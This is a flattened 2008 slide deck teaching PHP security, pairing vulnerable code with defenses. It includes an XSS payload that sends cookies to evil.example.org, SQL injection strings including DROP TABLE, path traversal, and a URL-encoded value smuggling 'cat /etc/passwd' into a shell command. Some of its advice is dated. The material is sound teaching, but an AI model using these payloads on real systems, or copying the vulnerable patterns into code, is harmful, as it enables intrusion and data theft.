php secure programming

1

K.Bala [email protected]

PHP Attacks and Defense

2

Most Secured computer in the

WORLDNo Need to secure the OSNo Need to secure the S/WNo need to do Anything It's Naturally Secured

3

Even No Need to Switch ON

4

Web Security ?PHP ?

5

PHP Mainly for Web Programs

Fact : 1

Fact : 2

Easy To Learn

6

PHP: 20,917,850 domains,

1,224,183 IP addresses

Fact : 3

Fact : 4

More Flexible Functions

7

Few Named threats

Code Injection SQL Injection Cross Site Script (XSS) Session Hijacking Session Fixation Temp Files abuse Remote Execution

More and More unNamed threats...

8

Code Injection

9

Code Injection

Dont directly pass the filenames

$filename = $_REQUEST['message'];$message = file_get_contents($filename);print $message;

This is ok: http://example.com/myscript.php?message=hello.txt

But what if I do like this?:

http://example.com/myscript.php?message=passwords.txt

10

Code Injection

This is especially important for includes, requireand require_once

$module = $_REQUEST['module'];include(“lib/$module”);

This is ok: http://example.com/cms?module=login.php

But what if I do like this?:

http://example.com/cms?module=../passwords.ini

11

Make sure the value is one you expected, if not...ERROR!

$requestedModule = $_REQUEST['module'];switch($requestedModule){ case “login”: $module = “login”; break; case “logout”: $module = “logout”; break; default: $module = “error”;}

Code InjectionDefense

12

SQL Injection

13

Form to user search ....

$username=$_POST['username'];$query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;"

If i give , $username a' or 't'='t

Query will be , "SELECT * FROM users WHERE name = ' a' or 't'='t ';"

SQL Injection

14

If i give , $username a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%

Query will be ,

SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% ';

SQL Injection

15

Use single quotation

eg: "select * from users where user= '.$username.'"

Check types of user submitted values

is_bool(), is_float(), is_numeric(), is_string(), is_int() , intval() , settype() ,strlen()

eg: strpos($query , ';')

Escape every questionable character in your query ' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE"

mysql_real_escape_string

SQL Injection

Defense

16

magic_quotes_gpc (default – on ) (deprecation – php 6.0)

If Off use addslashes

If On , If you don't needstripslashes

if (get_magic_quotes_gpc()){ $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE);

}

SQL Injection

Defense

17

Mysql Improved Extension

$query=mysqli_prepare($connection_string, "select * from user where user= ?"); mysqli_stmt_bind_param($query,"s",$username); mysqli_stmt_execute($query); sstring iinteger ddouble bbinary

PEAR DB, DataObject

SQL Injection

Defense

18

XSS – Cross Site Scripting

19

1.) Inserting scripts

<script>document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie</script>

2.) Login 3.) Set Cookies4.) Executes the scripts

XSS

5.) Steals the cookies

20

Remote control of the client browser

Reveal the value of a cookie

Change links on the page

Redirect to another URI

Render a bogus form

or

Any undesirable action ...

XSS

21

XSS Encode HTML Entities in All NonHTML Output htmlentities()

Eg:$str = "A 'quote' is <b>bold</b>";echo htmlentities($str);

Outputs Will be > A 'quote' is <b>bold</b>

Check the image upload URI (avatar, icon) parse_url

Eg: <img src=”http://shopping.example.com/addCart.php?item=123”/>

Show the domain name for User submitted Linkseg. Not safe > Hey click this to see my photo <a href=”http://badguys.net”>Bala</a>

safe > Hey click this to see my photo [badguys.net] Bala

Defense

22

Session Hijacking

23

What is Session ID ?

24

Victim

Attacker

Web Server

Session ID= AD238723FD32

Session Hijacking

25

Victim

Attacker

Web Server



Session Hijacking

26

Session Hijacking

Network Eavesdropping Promiscuous Mode

If Intranet ?Use Switch rather than a Hub

If wifi ? WEP Weired Equivalent Privacy If Internet ? SSL

27

Unwitting Exposure

Sending links

See this item http://store.com/items.php?item=0987

it's O.K , if i send like this,

http://store.com/items.php?item=0987&phpsessid=34223

How to Avoid ?

session.use_trans_sid (turned off by default)

session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)

Session Hijacking

28

Victim

Attacker

Web Server

Session Fixation

1.) See this link http://unsafesite?SID=3423

2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page Set SessionID =3423

session_id($_GET['SID'])

4.) Now Full Access http://unsafesite?SID=3423

29

Use SSL.

Use Cookies Instead of $_GET Variables. (ini_set ('session.use_only_cookies',TRUE);

ini_set ('session.use_trans_sid',FALSE); Use Session Timeouts ini_set('session.cookie_lifetime',1200) ini_set('session.gc_maxlifetime) Regenerate IDs for Users with Changed Status session_regenerate_id

Session Hijacking Defense

30

Remote Execution

31

Remote Execution

Injection of Shell commands

<?php$filename=$_GET['filename'];$command='/usr/bin/wc $filename”;$words=shell_exec ($command);print “$filename contains $words words.”;?>

This is ok ...wordcount.php?filename=textfile.txt

But, What if i give like this ...wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd

(filename > /dev/null | cat /etc/passwd )/usr/bin/wc /dev/null |cat /etc/passwd

32

Remote Execution

Allow only Trusted , Human Users to Import Code

Store uploads outside of Web Document Root

Limit allowable filename extensions for upload

Use disable_functions directiveeg:

disable_functions= “eval,phpinfo”

Do not include PHP scripts from Remote Servers

eg: <?phpinclude ('http://example.net/code/common.php') ?>

Properly escape all shell commandsescapeshellarg() , escapeshellcmd()

Defense

33

Future? PHP 6.0

Register Globals

Big security hole

Safe Mode

False sense of security

Magic Quotes

Messed with the data

Deprecation

Upcoming changes and featureshttp://www.php.net/~derick/meetingnotes.htmlhttp://www.phphacks.com/content/view/49/33/

Rasmus Lerdorf – PHP 6.0 Wish Listhttp://news.php.net/php.internals/17883

http://www.php.net/~derick/meeting-notes.html

http://www.phphacks.com/content/view/49/33/

http://news.php.net/php.internals/17883

34

What to do?

Proper Input Validation

Dont do Programming + Security

Do secure Programming

htmlentities, mysql_real_escape_string,

parse_url , addslashes ,escapeshellarg,

escapeshellcmd... etc

SSL

Use PEAR , PECL

35

Images From Flickr.com

reference http://flickr.com/photos/opinicus/246099418/remote_boy http://flickr.com/photo_zoom.gne?id=331355695&size=llevel_cross http://flickr.com/photo_zoom.gne?id=67342604&size=oinjection3 http://flickr.com/photos/fleurdelisa/249435636/building game1http://flickr.com/photo_zoom.gne?id=346575350&size=ocomputer_baby1http://flickr.com/photo_zoom.gne?id=102207751&size=ocountry_border1 http://flickr.com/photo_zoom.gne?id=48740674&size=lcomputer_baby http://flickr.com/photo_zoom.gne?id=436594815&size=mhijack http://flickr.com/photo_zoom.gne?id=463129891&size=ldog_security http://flickr.com/photo_zoom.gne?id=2205272682&size=l Id card http://flickr.com/photo_zoom.gne?id=1269802640&size=o

36

Reference

Pro PHP SecurityChris Snyder , Michael Southwell

http://wikipedia.org/

http://www.sitepoint.com/article/phpsecurityblunders

http://phpsec.org/

WWW.google.com

Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2

or any later version published by the Free Software Foundation.

http://www.gnu.org/copyleft/fdl.html